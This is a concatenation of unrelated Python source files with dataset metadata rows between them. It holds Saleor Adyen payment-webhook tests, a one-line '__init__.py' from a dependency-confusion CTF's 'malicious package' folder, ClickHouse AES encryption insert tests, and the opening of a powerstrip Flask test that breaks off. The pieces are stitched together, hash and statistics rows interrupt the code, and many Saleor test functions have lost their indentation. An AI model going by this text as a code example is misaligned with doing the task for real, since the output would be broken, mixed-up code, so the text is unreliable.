    payment.charge_status = ChargeStatus.PENDING
    payment_id = graphene.Node.to_global_id("Payment", payment.pk)
    notification = notification(
        merchant_reference=payment_id,
        value=to_adyen_price(payment.total, payment.currency),
    )
    config = adyen_plugin().config
    create_new_transaction(notification, payment, TransactionKind.PENDING)
    handle_pending(notification, config)
    assert payment.transactions.count() == 1
@mock.patch("saleor.payment.gateways.adyen.webhooks.order_refunded")
def test_handle_refund(
mock_order_refunded, notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_CHARGED
payment.captured_amount = payment.total
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
handle_refund(notification, config)
assert payment.transactions.count() == 1
transaction = payment.transactions.get()
assert transaction.is_success is True
assert transaction.kind == TransactionKind.REFUND
payment.refresh_from_db()
assert payment.charge_status == ChargeStatus.FULLY_REFUNDED
assert payment.captured_amount == Decimal("0.00")
mock_order_refunded.assert_called_once_with(
payment.order, None, transaction.amount, payment
)
@mock.patch("saleor.payment.gateways.adyen.webhooks.order_refunded")
def test_handle_refund_already_refunded(
mock_order_refunded, notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_REFUNDED
payment.captured_amount = Decimal("0.00")
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
create_new_transaction(notification, payment, TransactionKind.REFUND)
config = adyen_plugin().config
handle_refund(notification, config)
assert payment.transactions.count() == 1
assert not mock_order_refunded.called
def test_handle_failed_refund_missing_transaction(
notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_CHARGED
payment.captured_amount = payment.total
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
handle_failed_refund(notification, config)
assert payment.transactions.count() == 0
def test_handle_failed_refund_with_transaction_refund_ongoing(
notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_CHARGED
payment.captured_amount = payment.total
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
create_new_transaction(notification, payment, TransactionKind.REFUND_ONGOING)
handle_failed_refund(notification, config)
assert (
payment.transactions.count() == 3
) # REFUND_ONGOING, REFUND_FAILED, FULLY_CHARGED
assert payment.charge_status == ChargeStatus.FULLY_CHARGED
assert payment.total == payment.captured_amount
def test_handle_failed_refund_with_transaction_refund(
notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_REFUNDED
payment.captured_amount = Decimal("0.0")
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
create_new_transaction(notification, payment, TransactionKind.REFUND)
handle_failed_refund(notification, config)
payment.refresh_from_db()
assert payment.transactions.count() == 3 # REFUND, REFUND_FAILED, FULLY_CHARGED
assert payment.charge_status == ChargeStatus.FULLY_CHARGED
assert payment.total == payment.captured_amount
def test_handle_reversed_refund(notification, adyen_plugin, payment_adyen_for_order):
    # REFUND_REVERSED re-charges a previously refunded payment.
    payment = payment_adyen_for_order
    payment.charge_status = ChargeStatus.FULLY_REFUNDED
    payment.captured_amount = Decimal("0.0")
    payment.save()
    payment_id = graphene.Node.to_global_id("Payment", payment.pk)
    notification = notification(
        merchant_reference=payment_id,
        value=to_adyen_price(payment.total, payment.currency),
    )
    config = adyen_plugin().config
    handle_reversed_refund(notification, config)
    payment.refresh_from_db()
    assert payment.transactions.count() == 1  # REFUND_REVERSED
    assert payment.charge_status == ChargeStatus.FULLY_CHARGED
    assert payment.total == payment.captured_amount


def test_handle_reversed_refund_already_processed(
    notification, adyen_plugin, payment_adyen_for_order
):
    # A duplicate REFUND_REVERSED webhook must not add another transaction.
    payment = payment_adyen_for_order
    payment.charge_status = ChargeStatus.FULLY_CHARGED
    payment.captured_amount = payment.total
    payment.save()
    payment_id = graphene.Node.to_global_id("Payment", payment.pk)
    notification = notification(
        merchant_reference=payment_id,
        value=to_adyen_price(payment.total, payment.currency),
    )
    config = adyen_plugin().config
    create_new_transaction(notification, payment, TransactionKind.REFUND_REVERSED)
    handle_reversed_refund(notification, config)
    payment.refresh_from_db()
    assert payment.transactions.count() == 1
def test_webhook_not_implemented(notification, adyen_plugin, payment_adyen_for_order):
    """An unhandled webhook type still records exactly one order event."""
    payment = payment_adyen_for_order
    payment.charge_status = ChargeStatus.FULLY_CHARGED
    payment.captured_amount = payment.total
    payment.save()

    global_id = graphene.Node.to_global_id("Payment", payment.pk)
    payload = notification(
        merchant_reference=global_id,
        value=to_adyen_price(payment.total, payment.currency),
    )

    webhook_not_implemented(payload, adyen_plugin().config)

    assert payment.order.events.count() == 1
@mock.patch("saleor.payment.gateways.adyen.webhooks.handle_refund")
def test_handle_cancel_or_refund_action_refund(
mock_handle_refund, notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
config = adyen_plugin().config
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
notification["additionalData"]["modification.action"] = "refund"
handle_cancel_or_refund(notification, config)
mock_handle_refund.assert_called_once_with(notification, config)
@mock.patch("saleor.payment.gateways.adyen.webhooks.handle_cancellation")
def test_handle_cancel_or_refund_action_cancel(
mock_handle_cancellation, notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
config = adyen_plugin().config
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
notification["additionalData"]["modification.action"] = "cancel"
handle_cancel_or_refund(notification, config)
mock_handle_cancellation.assert_called_once_with(notification, config)
| 35.280876
| 86
| 0.759754
| 2,057
| 17,711
| 6.216334
| 0.060282
| 0.039571
| 0.053961
| 0.071948
| 0.883475
| 0.870337
| 0.85063
| 0.836396
| 0.808243
| 0.792445
| 0
| 0.003149
| 0.157303
| 17,711
| 501
| 87
| 35.351297
| 0.853601
| 0.01931
| 0
| 0.707617
| 0
| 0
| 0.035885
| 0.015495
| 0
| 0
| 0
| 0
| 0.144963
| 1
| 0.056511
| false
| 0
| 0.019656
| 0
| 0.076167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4cf073b1b3e0c119caee67b6c90354caba8cfa8
| 23
|
py
|
Python
|
internal-dependency-ctf/attacker/malicious package/password/__init__.py
|
garcilazor/Software_Supply_Chain_CTF
|
a0cd91d5e72ded132178c3f5868bf78b677316d5
|
[
"MIT"
] | null | null | null |
internal-dependency-ctf/attacker/malicious package/password/__init__.py
|
garcilazor/Software_Supply_Chain_CTF
|
a0cd91d5e72ded132178c3f5868bf78b677316d5
|
[
"MIT"
] | 21
|
2021-08-06T01:42:28.000Z
|
2021-08-08T18:57:40.000Z
|
internal-dependency-ctf/attacker/malicious package/password/__init__.py
|
garcilazor/Software_Supply_Chain_CTF
|
a0cd91d5e72ded132178c3f5868bf78b677316d5
|
[
"MIT"
] | 1
|
2021-09-03T22:24:37.000Z
|
2021-09-03T22:24:37.000Z
|
from password import *
| 11.5
| 22
| 0.782609
| 3
| 23
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 23
| 1
| 23
| 23
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
c4d80c8589624fdc7ed8344cbd227c87087e429d
| 22,995
|
py
|
Python
|
tests/testflows/aes_encryption/tests/compatibility/insert.py
|
chalice19/ClickHouse
|
2f38e7bc5c2113935ab86260439bb543a1737291
|
[
"Apache-2.0"
] | 1
|
2022-02-27T15:21:20.000Z
|
2022-02-27T15:21:20.000Z
|
tests/testflows/aes_encryption/tests/compatibility/insert.py
|
chalice19/ClickHouse
|
2f38e7bc5c2113935ab86260439bb543a1737291
|
[
"Apache-2.0"
] | 16
|
2022-02-14T15:53:29.000Z
|
2022-03-25T18:39:16.000Z
|
tests/testflows/aes_encryption/tests/compatibility/insert.py
|
chalice19/ClickHouse
|
2f38e7bc5c2113935ab86260439bb543a1737291
|
[
"Apache-2.0"
] | null | null | null |
import os
import textwrap
from contextlib import contextmanager
from importlib.machinery import SourceFileLoader
from testflows.core import *
from testflows.core.name import basename
from testflows.asserts.helpers import varname
from testflows.asserts import values, error, snapshot
from aes_encryption.tests.common import modes, mysql_modes
@contextmanager
def table(name):
    """Create a Memory-engine table `name` with Nullable (date, name, secret)
    columns for the duration of the `with` block, dropping it afterwards.
    """
    node = current().context.node
    try:
        with Given("table"):
            sql = f"""
                CREATE TABLE {name}
                (
                    date Nullable(Date),
                    name Nullable(String),
                    secret Nullable(String)
                )
                ENGINE = Memory()
                """
            # Drop first so a leftover table from an aborted run cannot make
            # the CREATE fail.
            with By("dropping table if exists"):
                node.query(f"DROP TABLE IF EXISTS {name}")
            with And("creating a table"):
                node.query(textwrap.dedent(sql))
        yield
    finally:
        # flags=TE — NOTE(review): testflows flag on the cleanup step;
        # presumably tolerates an error during teardown — confirm.
        with Finally("I drop the table", flags=TE):
            node.query(f"DROP TABLE IF EXISTS {name}")
@contextmanager
def mv_transform(table, transform):
    """Create a Null-engine input table `{table}_input` plus a materialized
    view `{table}_input_mv` that applies `transform` to each inserted row and
    writes the result into `table`; both are dropped on exit.

    NOTE: the `table` parameter shadows the module-level `table` context
    manager inside this function.
    """
    node = current().context.node
    try:
        with Given("tables for input transformation"):
            # Null engine: rows inserted here are not stored; they only flow
            # through the attached materialized view below.
            with By("creating Null input table"):
                sql = f"""
                    CREATE TABLE {table}_input
                    (
                        date Nullable(Date),
                        name Nullable(String),
                        secret Nullable(String),
                        mode String,
                        key String,
                        iv String,
                        aad String
                    )
                    ENGINE=Null()
                    """
                node.query(textwrap.dedent(sql))
            with And("creating materialized view table"):
                sql = f"""
                    CREATE MATERIALIZED VIEW {table}_input_mv TO {table} AS
                    SELECT date, name, {transform}
                    FROM {table}_input
                    """
                node.query(textwrap.dedent(sql))
        yield
    finally:
        with Finally("I drop tables for input transformation", flags=TE):
            # Drop the view first, then the table it reads from.
            with By("dropping materialized view table", flags=TE):
                node.query(f"DROP TABLE IF EXISTS {table}_input_mv")
            with And("dropping Null input table", flags=TE):
                node.query(f"DROP TABLE IF EXISTS {table}_input")
@TestScenario
def encrypt_using_materialized_view(self):
    """Check that we can use `encrypt` function when inserting
    data into a table using a materialized view for input
    data transformation.
    """
    node = self.context.node
    # Key/iv material is longer than any mode needs; each example slices
    # a prefix of the required length.
    key = f"{'1' * 36}"
    iv = f"{'2' * 16}"
    aad = "some random aad"

    for mode, key_len, iv_len, aad_len in modes:
        with Example(
            f"""mode={mode.strip("'")} iv={iv_len} aad={aad_len}"""
        ) as example:
            example_key = f"'{key[:key_len]}'"
            example_mode = mode
            # iv/aad are optional: included only when the mode defines them.
            example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
            example_aad = None if not aad_len else f"'{aad}'"
            example_transform = f"encrypt(mode, secret, key{', iv' if example_iv else ''}{', aad' if example_aad else ''})"

            with table("user_data"):
                with mv_transform("user_data", example_transform):
                    with When("I insert encrypted data"):
                        node.query(
                            f"""
                            INSERT INTO user_data_input
                                (date, name, secret, mode, key)
                            VALUES
                                ('2020-01-01', 'user0', 'user0_secret', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}{(", " + example_aad) if example_aad else ""}),
                                ('2020-01-02', 'user1', 'user1_secret', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}{(", " + example_aad) if example_aad else ""}),
                                ('2020-01-03', 'user2', 'user2_secret', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}{(", " + example_aad) if example_aad else ""})
                            """
                        )

                with And("I read inserted data back"):
                    # BUG FIX: capture the query result — it was previously
                    # discarded, making `r.output` below a NameError.
                    r = node.query(
                        "SELECT date, name, hex(secret) FROM user_data ORDER BY date"
                    )

                with Then("output must match the snapshot"):
                    with values() as that:
                        # NOTE(review): sibling scenarios derive the snapshot
                        # name from example.name, not self.name — confirm the
                        # two resolve to the same key here.
                        assert that(
                            snapshot(
                                r.output.strip(),
                                "insert",
                                name=f"encrypt_mv_example_{varname(basename(self.name))}",
                            )
                        ), error()
@TestScenario
def aes_encrypt_mysql_using_materialized_view(self):
    """Check that we can use `aes_encrypt_mysql` function when inserting
    data into a table using a materialized view for input
    data transformation.
    """
    node = self.context.node
    # Key/iv material is longer than any mode needs; each example slices
    # a prefix of the required length.
    key = f"{'1' * 64}"
    iv = f"{'2' * 64}"
    aad = "some random aad"

    for mode, key_len, iv_len in mysql_modes:
        with Example(
            f"""mode={mode.strip("'")} key={key_len} iv={iv_len}"""
        ) as example:
            example_key = f"'{key[:key_len]}'"
            example_mode = mode
            # iv is optional: included only when the mode defines it
            # (the MySQL-compatible functions take no aad).
            example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
            example_transform = (
                f"aes_encrypt_mysql(mode, secret, key{', iv' if example_iv else ''})"
            )

            with table("user_data"):
                with mv_transform("user_data", example_transform):
                    with When("I insert encrypted data"):
                        node.query(
                            f"""
                            INSERT INTO user_data_input
                                (date, name, secret, mode, key)
                            VALUES
                                ('2020-01-01', 'user0', 'user0_secret', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}),
                                ('2020-01-02', 'user1', 'user1_secret', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}),
                                ('2020-01-03', 'user2', 'user2_secret', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""})
                            """
                        )

                with And("I read inserted data back"):
                    # BUG FIX: capture the query result — it was previously
                    # discarded, making `r.output` below a NameError.
                    r = node.query(
                        "SELECT date, name, hex(secret) FROM user_data ORDER BY date"
                    )

                with Then("output must match the snapshot"):
                    with values() as that:
                        # NOTE(review): sibling scenarios derive the snapshot
                        # name from example.name, not self.name — confirm the
                        # two resolve to the same key here.
                        assert that(
                            snapshot(
                                r.output.strip(),
                                "insert",
                                name=f"aes_encrypt_mysql_mv_example_{varname(basename(self.name))}",
                            )
                        ), error()
@TestScenario
def encrypt_using_input_table_function(self):
    """Check that we can use `encrypt` function when inserting
    data into a table using insert select and `input()` table
    function.
    """
    node = self.context.node
    # Key/iv material is longer than any mode needs; each example slices
    # a prefix of the required length.
    key = f"{'1' * 36}"
    iv = f"{'2' * 16}"
    aad = "some random aad"
    for mode, key_len, iv_len, aad_len in modes:
        with Example(
            f"""mode={mode.strip("'")} iv={iv_len} aad={aad_len}"""
        ) as example:
            example_key = f"'{key[:key_len]}'"
            example_mode = mode
            # iv/aad are optional: included only when the mode defines them.
            example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
            example_aad = None if not aad_len else f"'{aad}'"
            # Here the transform is inlined into the SELECT, so mode/key/iv/aad
            # are baked in as literals rather than read from input columns.
            example_transform = f"encrypt({mode}, secret, {example_key}{(', ' + example_iv) if example_iv else ''}{(', ' + example_aad) if example_aad else ''})"
            with table("user_data"):
                with When("I insert encrypted data"):
                    node.query(
                        f"""
                        INSERT INTO
                            user_data
                        SELECT
                            date, name, {example_transform}
                        FROM
                            input('date Date, name String, secret String')
                        FORMAT Values ('2020-01-01', 'user0', 'user0_secret'), ('2020-01-02', 'user1', 'user1_secret'), ('2020-01-03', 'user2', 'user2_secret')
                        """
                    )
                with And("I read inserted data back"):
                    r = node.query(
                        "SELECT date, name, hex(secret) FROM user_data ORDER BY date"
                    )
                with Then("output must match the snapshot"):
                    with values() as that:
                        assert that(
                            snapshot(
                                r.output.strip(),
                                "insert",
                                name=f"encrypt_input_example_{varname(basename(example.name))}",
                            )
                        ), error()
@TestScenario
def aes_encrypt_mysql_using_input_table_function(self):
    """Check that we can use `aes_encrypt_mysql` function when inserting
    data into a table using insert select and `input()` table
    function.
    """
    node = self.context.node
    # Key/iv material is longer than any mode needs; each example slices
    # a prefix of the required length.
    key = f"{'1' * 64}"
    iv = f"{'2' * 64}"
    aad = "some random aad"
    for mode, key_len, iv_len in mysql_modes:
        with Example(
            f"""mode={mode.strip("'")} key={key_len} iv={iv_len}"""
        ) as example:
            example_key = f"'{key[:key_len]}'"
            example_mode = mode
            # iv is optional; the MySQL-compatible functions take no aad.
            example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
            # Transform inlined into the SELECT with mode/key/iv as literals.
            example_transform = f"aes_encrypt_mysql({mode}, secret, {example_key}{(', ' + example_iv) if example_iv else ''})"
            with table("user_data"):
                with When("I insert encrypted data"):
                    node.query(
                        f"""
                        INSERT INTO
                            user_data
                        SELECT
                            date, name, {example_transform}
                        FROM
                            input('date Date, name String, secret String')
                        FORMAT Values ('2020-01-01', 'user0', 'user0_secret'), ('2020-01-02', 'user1', 'user1_secret'), ('2020-01-03', 'user2', 'user2_secret')
                        """
                    )
                with And("I read inserted data back"):
                    r = node.query(
                        "SELECT date, name, hex(secret) FROM user_data ORDER BY date"
                    )
                with Then("output must match the snapshot"):
                    with values() as that:
                        assert that(
                            snapshot(
                                r.output.strip(),
                                "insert",
                                name=f"aes_encrypt_mysql_input_example_{varname(basename(example.name))}",
                            )
                        ), error()
@TestScenario
def decrypt_using_materialized_view(self):
    """Check that we can use `decrypt` function when inserting
    data into a table using a materialized view for input
    data transformation.
    """
    node = self.context.node
    key = f"{'1' * 36}"
    iv = f"{'2' * 16}"
    aad = "some random aad"

    with Given("I load encrypt snapshots"):
        # Ciphertexts written by the encrypt scenarios are read back from the
        # snapshot file and fed to decrypt below.
        snapshot_module = SourceFileLoader(
            "snapshot",
            os.path.join(current_dir(), "snapshots", "insert.py.insert.snapshot"),
        ).load_module()

    for mode, key_len, iv_len, aad_len in modes:
        with Example(
            f"""mode={mode.strip("'")} iv={iv_len} aad={aad_len}"""
        ) as example:
            example_key = f"'{key[:key_len]}'"
            example_mode = mode
            example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
            example_aad = None if not aad_len else f"'{aad}'"
            example_transform = f"decrypt(mode, secret, key{', iv' if example_iv else ''}{', aad' if example_aad else ''})"

            with Given("I have ciphertexts"):
                example_name = basename(example.name)
                ciphertexts = getattr(
                    snapshot_module, varname(f"encrypt_mv_example_{example_name}")
                )
                # BUG FIX: `.strup` is not a str method and raised
                # AttributeError; `.strip("'")` removes the surrounding quotes.
                example_ciphertexts = [
                    "'{}'".format(l.split("\t")[-1].strip("'"))
                    for l in ciphertexts.split("\n")
                ]

            with table("user_data"):
                with mv_transform("user_data", example_transform):
                    with When("I insert encrypted data"):
                        # NOTE(review): the unhex(...) expression is inside
                        # single quotes, so it is inserted as a literal string
                        # rather than evaluated — confirm this is intended.
                        node.query(
                            f"""
                            INSERT INTO user_data_input
                                (date, name, secret, mode, key)
                            VALUES
                                ('2020-01-01', 'user0', 'unhex({example_ciphertexts[0]})', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}{(", " + example_aad) if example_aad else ""}),
                                ('2020-01-02', 'user1', 'unhex({example_ciphertexts[1]})', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}{(", " + example_aad) if example_aad else ""}),
                                ('2020-01-03', 'user2', 'unhex({example_ciphertexts[2]})', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}{(", " + example_aad) if example_aad else ""})
                            """
                        )

                with And("I read inserted data back"):
                    r = node.query(
                        "SELECT date, name, secret FROM user_data ORDER BY date"
                    )

                with Then("output must match the expected"):
                    expected = r"""'2020-01-01\tuser0\tuser0_secret\n2020-01-02\tuser1\tuser1_secret\n2020-01-03\tuser2\tuser2_secret'"""
                    assert r.output == expected, error()
@TestScenario
def aes_decrypt_mysql_using_materialized_view(self):
    """Check that we can use `aes_decrypt_mysql` function when inserting
    data into a table using a materialized view for input
    data transformation.
    """
    node = self.context.node
    key = f"{'1' * 36}"
    iv = f"{'2' * 16}"
    aad = "some random aad"

    with Given("I load encrypt snapshots"):
        # Ciphertexts written by the encrypt scenarios are read back from the
        # snapshot file and fed to aes_decrypt_mysql below.
        snapshot_module = SourceFileLoader(
            "snapshot",
            os.path.join(current_dir(), "snapshots", "insert.py.insert.snapshot"),
        ).load_module()

    # NOTE(review): iterates `modes` (4-tuples with aad_len) although this is
    # the MySQL variant; the sibling encrypt scenario uses `mysql_modes` —
    # confirm which is intended.
    for mode, key_len, iv_len, aad_len in modes:
        with Example(
            f"""mode={mode.strip("'")} key={key_len} iv={iv_len}"""
        ) as example:
            example_key = f"'{key[:key_len]}'"
            example_mode = mode
            example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
            example_aad = None if not aad_len else f"'{aad}'"
            example_transform = (
                f"aes_decrypt_mysql(mode, secret, key{', iv' if example_iv else ''})"
            )

            with Given("I have ciphertexts"):
                example_name = basename(example.name)
                ciphertexts = getattr(
                    snapshot_module,
                    varname(f"aes_encrypt_mysql_mv_example_{example_name}"),
                )
                # BUG FIX: `.strup` is not a str method and raised
                # AttributeError; `.strip("'")` removes the surrounding quotes.
                example_ciphertexts = [
                    "'{}'".format(l.split("\t")[-1].strip("'"))
                    for l in ciphertexts.split("\n")
                ]

            with table("user_data"):
                with mv_transform("user_data", example_transform):
                    with When("I insert encrypted data"):
                        # NOTE(review): the unhex(...) expression is inside
                        # single quotes, so it is inserted as a literal string
                        # rather than evaluated — confirm this is intended.
                        node.query(
                            f"""
                            INSERT INTO user_data_input
                                (date, name, secret, mode, key)
                            VALUES
                                ('2020-01-01', 'user0', 'unhex({example_ciphertexts[0]})', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}),
                                ('2020-01-02', 'user1', 'unhex({example_ciphertexts[1]})', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""}),
                                ('2020-01-03', 'user2', 'unhex({example_ciphertexts[2]})', {example_mode}, {example_key}{(", " + example_iv) if example_iv else ""})
                            """
                        )

                with And("I read inserted data back"):
                    r = node.query(
                        "SELECT date, name, secret FROM user_data ORDER BY date"
                    )

                with Then("output must match the expected"):
                    expected = r"""'2020-01-01\tuser0\tuser0_secret\n2020-01-02\tuser1\tuser1_secret\n2020-01-03\tuser2\tuser2_secret'"""
                    assert r.output == expected, error()
@TestScenario
def decrypt_using_input_table_function(self):
    """Check that we can use `decrypt` function when inserting
    data into a table using insert select and `input()` table
    function.
    """
    node = self.context.node
    key = f"{'1' * 36}"
    iv = f"{'2' * 16}"
    aad = "some random aad"
    with Given("I load encrypt snapshots"):
        # Ciphertexts written by encrypt_using_input_table_function are read
        # back from the snapshot file and decrypted below.
        snapshot_module = SourceFileLoader(
            "snapshot",
            os.path.join(current_dir(), "snapshots", "insert.py.insert.snapshot"),
        ).load_module()
    for mode, key_len, iv_len, aad_len in modes:
        with Example(
            f"""mode={mode.strip("'")} iv={iv_len} aad={aad_len}"""
        ) as example:
            example_key = f"'{key[:key_len]}'"
            example_mode = mode
            example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
            example_aad = None if not aad_len else f"'{aad}'"
            example_transform = f"decrypt({mode}, unhex(secret), {example_key}{(', ' + example_iv) if example_iv else ''}{(', ' + example_aad) if example_aad else ''})"
            with Given("I have ciphertexts"):
                example_name = basename(example.name)
                ciphertexts = getattr(
                    snapshot_module, varname(f"encrypt_input_example_{example_name}")
                )
                # Splits on the two-character sequences backslash-t /
                # backslash-n, i.e. the escaped form stored in the snapshot —
                # NOTE(review): differs from the MV variants, which split on
                # real tab/newline; confirm the snapshot format.
                example_ciphertexts = [
                    l.split("\\t")[-1].strip("'") for l in ciphertexts.split("\\n")
                ]
            with table("user_data"):
                with When("I insert decrypted data"):
                    node.query(
                        textwrap.dedent(
                            f"""
                            INSERT INTO
                                user_data
                            SELECT
                                date, name, {example_transform}
                            FROM
                                input('date Date, name String, secret String')
                            FORMAT Values ('2020-01-01', 'user0', '{example_ciphertexts[0]}'), ('2020-01-02', 'user1', '{example_ciphertexts[1]}'), ('2020-01-03', 'user2', '{example_ciphertexts[2]}')
                            """
                        )
                    )
                with And("I read inserted data back"):
                    r = node.query(
                        "SELECT date, name, secret FROM user_data ORDER BY date"
                    )
                # Non-raw string: \t and \n here are real tab/newline chars.
                expected = """2020-01-01\tuser0\tuser0_secret\n2020-01-02\tuser1\tuser1_secret\n2020-01-03\tuser2\tuser2_secret"""
                with Then("output must match the expected", description=expected):
                    assert r.output == expected, error()
@TestScenario
def aes_decrypt_mysql_using_input_table_function(self):
    """Check that we can use `aes_decrypt_mysql` function when inserting
    data into a table using insert select and `input()` table
    function.
    """
    node = self.context.node
    key = f"{'1' * 64}"
    iv = f"{'2' * 64}"
    aad = "some random aad"
    with Given("I load encrypt snapshots"):
        # Ciphertexts written by aes_encrypt_mysql_using_input_table_function
        # are read back from the snapshot file and decrypted below.
        snapshot_module = SourceFileLoader(
            "snapshot",
            os.path.join(current_dir(), "snapshots", "insert.py.insert.snapshot"),
        ).load_module()
    for mode, key_len, iv_len in mysql_modes:
        with Example(
            f"""mode={mode.strip("'")} key={key_len} iv={iv_len}"""
        ) as example:
            example_key = f"'{key[:key_len]}'"
            example_mode = mode
            example_iv = None if not iv_len else f"'{iv[:iv_len]}'"
            example_transform = f"aes_decrypt_mysql({mode}, unhex(secret), {example_key}{(', ' + example_iv) if example_iv else ''})"
            with Given("I have ciphertexts"):
                example_name = basename(example.name)
                ciphertexts = getattr(
                    snapshot_module,
                    varname(f"aes_encrypt_mysql_input_example_{example_name}"),
                )
                # Splits on the two-character sequences backslash-t /
                # backslash-n, i.e. the escaped form stored in the snapshot —
                # NOTE(review): differs from the MV variants, which split on
                # real tab/newline; confirm the snapshot format.
                example_ciphertexts = [
                    l.split("\\t")[-1].strip("'") for l in ciphertexts.split("\\n")
                ]
            with table("user_data"):
                with When("I insert decrypted data"):
                    node.query(
                        textwrap.dedent(
                            f"""
                            INSERT INTO
                                user_data
                            SELECT
                                date, name, {example_transform}
                            FROM
                                input('date Date, name String, secret String')
                            FORMAT Values ('2020-01-01', 'user0', '{example_ciphertexts[0]}'), ('2020-01-02', 'user1', '{example_ciphertexts[1]}'), ('2020-01-03', 'user2', '{example_ciphertexts[2]}')
                            """
                        )
                    )
                with And("I read inserted data back"):
                    r = node.query(
                        "SELECT date, name, secret FROM user_data ORDER BY date"
                    )
                # Non-raw string: \t and \n here are real tab/newline chars.
                expected = """2020-01-01\tuser0\tuser0_secret\n2020-01-02\tuser1\tuser1_secret\n2020-01-03\tuser2\tuser2_secret"""
                with Then("output must match the expected", description=expected):
                    assert r.output == expected, error()
@TestFeature
@Name("insert")
def feature(self, node="clickhouse1"):
    """Check encryption functions when used during data insertion into a table."""
    self.context.node = self.context.cluster.node(node)
    # Collect every Scenario defined in this module and run them all.
    scenarios = loads(current_module(), Scenario)
    for insert_scenario in scenarios:
        Scenario(run=insert_scenario, flags=TE)
| 42.821229
| 210
| 0.488932
| 2,406
| 22,995
| 4.510391
| 0.0665
| 0.036491
| 0.020273
| 0.023959
| 0.90868
| 0.901309
| 0.901309
| 0.893015
| 0.887947
| 0.853852
| 0
| 0.029608
| 0.39339
| 22,995
| 536
| 211
| 42.901119
| 0.748369
| 0.049228
| 0
| 0.738532
| 0
| 0.050459
| 0.46456
| 0.070004
| 0
| 0
| 0
| 0
| 0.022936
| 1
| 0.025229
| false
| 0
| 0.020642
| 0
| 0.045872
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f225bee7fcdba877120586116dc916494d4d6b5b
| 5,901
|
py
|
Python
|
app/test_priu.py
|
robhaswell/powerstrip-restrict-image-user
|
d6a5dbb19330f1ee5b384095c1010636af12120d
|
[
"Apache-2.0"
] | null | null | null |
app/test_priu.py
|
robhaswell/powerstrip-restrict-image-user
|
d6a5dbb19330f1ee5b384095c1010636af12120d
|
[
"Apache-2.0"
] | null | null | null |
app/test_priu.py
|
robhaswell/powerstrip-restrict-image-user
|
d6a5dbb19330f1ee5b384095c1010636af12120d
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import json as _json
import lib
import priu
class FlaskrTestCase(unittest.TestCase):
def setUp(self):
self.app = priu.app.test_client()
def test_integration_create_user_success(self):
"""
The request is returned unmodified when the user is allowed.
"""
priu.app.config['ALLOWED_USER'] = "good"
path = "/v1.16/containers/create"
